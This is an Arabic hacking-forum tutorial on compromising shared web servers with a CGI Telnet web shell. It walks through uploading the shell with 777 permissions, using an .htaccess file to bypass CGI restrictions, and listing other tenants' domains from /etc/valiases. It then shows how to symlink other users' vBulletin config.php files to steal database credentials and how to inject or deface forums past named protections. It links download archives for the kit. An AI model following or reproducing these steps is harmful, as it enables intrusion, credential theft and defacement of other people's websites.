درس ع السريع اللي يفهمه كان بها واللي مايفهمه ياويله لو يقولي اريد صور
عارفيـن ان الناس صارت تهتم بالحمايه ضد شلات البي اتش بي وبالفعل كثار نجحـوا بهالشي وتم منع تخطي الحمايـه
ولكن اليوم طريقـه جديده وهي الاختراق عن طريق السي .. CGI Telnet
شرح السكربت ع السريع
ارفـع السكربت على اي مجلد وعطه تصريح 777 وشغلـه وبس
طبعا بعض السيرفرات موقفه خاصية السي والبيرل عندي الحل
اللي هي تخطي الحمايه عن طريق ملف الهاشوس .httaccess اللي حنا بمجال الحمايه نسميه ابو نقطـه
كيف تتخطى الحمايـه
الملف مرفق ارفعه على نفس المجلـد اللي ركبت فيه شل السي جي آي ..
وشغل السكربت من جـديد بيشتغل معـك .. الا اذا كان صاحب السيرفر عبقري ومرقع الثغره فيه طرق ثانيه بشرحها بدرس ثانـي
الحين اشتغل عندك السكربت يطلب منك اول مايشتغل باسوورد
دخل الباسوورد اللي هي dark-hacker واضغط انتر
يجي عندك سطر الاوامر
اول شي امر عرض المواقع اللي كنا نطبقه على شل البي اتش بي
نفسه
هذا هو
ls -la /etc/valiases
يجي عندك الدومين واليوزر
الحين طريقة سحب الكونفيق
عن طريق ادخال الامر
ln -s /home/user/public_html/vb/includes/config.php name
انسخ الامر والصقه
ولاتنسى تبديل كلمة user ليوزر الموقع اللي تبي تخترقه
وتغيير name اللي هي المسمى الجديد للكونفيق
بشرح لكم مثال
عندنا موقع اسمه كذا
www.dark.com
واليوزر حقه dark
نبي نسحب الكونفيق حقه
على سبيل ان سكربت السي مرفوع على مجلد بنفس الموقع يكون اسمه images
يعني كذا www.dark.com/images/dark.txt
هذا رابط السكربت
نكتب الامر بهالطريقه
ln -s /home/hunter/public_html/vb/includes/config.php hunter
الحين نبي نشوف الكونفيق
اما عن طريق امر cat
او من المتصفح مباشرة بهالطريقه
www.dark.com/images/dark
يطلع لك الكونفيق مثل ماهو ماعليك الا تنسخ اسم القاعده وبياناتها وتحطها بسكربت الزرع
سكربت الزرع وين ؟
هو سكربت جديد لحقن القواعد بعد سحب الكونفيق
الكـل عارف ان هاك الحمايه حق جايتكس تيم او الفريق الامني صار يمنع الحقن عن طريق سكربت مهاجر .. اللي وظيفته تغيير صفحات المنتدى كامله
هذا الهاك يتخطى هالحمايـه .. مجرب !!
هذا هو ياحلوين على هالرابط http://rapidshare.com/files/17721997...acker.rar.html
يتخطى حماية هاك جايتكس تيم والفريق البطيخي خخخخخخخ
ملاحظات هامه :
تأكد انك معطي تصريح 777 للمجلد اللي رافع العده عليه
اذا ماشتغل معاك السكربت اعطيه تصريح 777
اذا ماشتغل انقله على مجلد cgi-bin واعطيه تصريح الثلث سبعات
لازم تتأكد انك رافع ملف httaccess بنفس مجلد العده
حمل العده من المرفقات بتجد 3 ملفات واحد ملحق بيرل والثاني تكست والثالث ملف الهاش لتخطي الحمايه
جرب شغل البيرل اول ماشتغل شغل التكست
لتحميل http://rapidshare.com/files/177216506/cgi.rar.html
سلام
s;vdfj CGI telnet vhzu td jo'd hgplhdm , spf hg;,ktdr